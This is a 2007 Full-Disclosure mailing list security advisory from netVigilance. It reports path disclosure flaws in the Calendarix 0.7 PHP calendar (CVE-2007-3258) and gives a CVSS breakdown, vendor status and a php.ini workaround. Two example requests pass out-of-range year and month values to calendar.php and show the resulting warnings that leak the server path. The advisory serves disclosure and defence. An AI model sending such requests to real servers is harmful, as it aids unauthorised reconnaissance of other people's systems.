[prev in list] [next in list] [prev in thread] [next in thread]
List: full-disclosure
Subject: [Full-disclosure] Calendarix version 0.7. 20070307 Multiple Path
From: "SecurityResearch" <securityresearch () netvigilance ! com>
Date: 2007-06-25 16:28:23
Message-ID: 012FDE7DE21D97498794A72AEEF90D7F06A5B8 () beaverton ! portland ! local
[Download RAW message or body]
netVigilance Security Advisory #35
Calendarix version 0.7. 20070307 Multiple Path Disclosure Vulnerabilities
Description:
Calendarix is a powerful and easy to use calendar based on PHP and MySQL. It has been \
developed with ease of use and quick access to information in mind. It provides the \
user with the quickest possible navigation and accessing the most commonly used \
functions in the shortest steps. This vulnerabilities can be exploited only with PHP \
version < 5.0.0 and MS Windows hosting. External References:
Mitre CVE: CVE-2007-3258
NVD NIST: CVE-2007-3258
OSVDB: 35371
Summary:
Calendarix is a powerful and easy to use calendar based on PHP and MySQL.
Security problems in the product allow attackers to gather the true path of the \
server-side script. Advisory URL:
http://www.netvigilance.com/advisory0035
Release Date:
06/19/2007
Severity:
Risk: Low
CVSS Metrics
Access Vector: Remote
Access Complexity: High
Authentication: Not-required
Confidentiality Impact: Partial
Integrity Impact: None
Availability Impact: None
Impact Bias: Normal
CVSS Base Score: 1.86
Target Distribution on Internet: Low
Exploitability: Functional Exploit
Remediation Level: Workaround
Report Confidence: Uncorroborated
Vulnerability Impact: Attack
Host Impact: Path disclosure.
SecureScout Testcase ID:
TC 17967
Vulnerable Systems:
Calendarix version 0.7. 20070307
Vulnerability Type:
Program flaws - The product scripts have flaws which lead to Warnings or even Fatal \
Errors. Vendor:
Vincent Hor (Calendarix Enterprise)
Vendor Status:
Vincent Hor of Calendarix Enterprise was not interested in coordinating release of \
Patch and Security Advisory, There is no official solution at this time. Workaround:
Disable warning messages: modify in the php.ini file following line: display_errors = \
Off.
Example:
Path Disclosure Vulnerability 1:
REQUEST:
http://[TARGET]/[PRODUCT-DIRECTORY]/calendar.php?year=10000
REPLY:
<b>Warning</b>: mktime(): Windows does not support negative values for this function \
in <b>[DISCLOSED PATH][PRODUCT-DIRECTORY]\calendar.php</b> on line <b>55</b><br \
/><b>Warning</b>: date(): Windows does not support dates prior to midnight \
(00:00:00), January 1, 1970 in <b>[DISCLOSED \
PATH][PRODUCT-DIRECTORY]\calendar.php</b> on line <b>55</b><br />
...
<b>Warning</b>: mktime(): Windows does not support negative values for this function \
in <b>[DISCLOSED PATH][PRODUCT-DIRECTORY]\calendar.php</b> on line <b>67</b><br \
/><b>Warning</b>: date(): Windows does not support dates prior to midnight \
(00:00:00), January 1, 1970 in <b>[DISCLOSED \
PATH][PRODUCT-DIRECTORY]\calendar.php</b> on line <b>67</b><br /> Path Disclosure \
Vulnerability 2: REQUEST:
http://[TARGET]/[PRODUCT-DIRECTORY]/calendar.php?month=10000
REPLY:
<b>Warning</b>: mktime(): Windows does not support negative values for this function \
in <b>[DISCLOSED PATH][PRODUCT-DIRECTORY]\calendar.php</b> on line <b>55</b><br \
/><b>Warning</b>: date(): Windows does not support dates prior to midnight \
(00:00:00), January 1, 1970 in <b>[DISCLOSED \
PATH][PRODUCT-DIRECTORY]\calendar.php</b> on line <b>55</b><br />
...
<b>Warning</b>: mktime(): Windows does not support negative values for this function \
in <b>[DISCLOSED PATH][PRODUCT-DIRECTORY]\calendar.php</b> on line <b>67</b><br \
/><b>Warning</b>: date(): Windows does not support dates prior to midnight \
(00:00:00), January 1, 1970 in <b>[DISCLOSED \
PATH][PRODUCT-DIRECTORY]\calendar.php</b> on line <b>67</b><br />
Credits:
Jesper Jurcenoks
Co-founder netVigilance, Inc
www.netvigilance.com
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic